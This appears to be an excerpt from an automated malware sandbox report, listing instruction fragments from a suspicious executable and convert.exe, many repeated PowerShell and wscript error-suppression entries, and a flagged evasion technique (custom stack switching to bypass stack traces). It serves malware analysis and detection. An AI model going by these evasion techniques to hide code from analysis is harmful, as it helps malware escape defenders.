Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACA0F1 push ebx; ret	17_2_03ACA0F6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABA735 push FFFFFFCBh; retf	17_2_03ABA73C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC65F9 push ebx; iretd	17_2_03AC65FA
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABED13 push edi; retf	17_2_03ABED23
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AD356F push es; iretd	17_2_03AD357F
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABB567 pushfd ; iretd	17_2_03ABB569
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC6488 push edi; retf	17_2_03AC649F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036909AD push ecx; mov dword ptr [esp], ecx	19_2_036909B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_035653DB pushfd ; ret	19_2_035653E3

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FFDB442D324
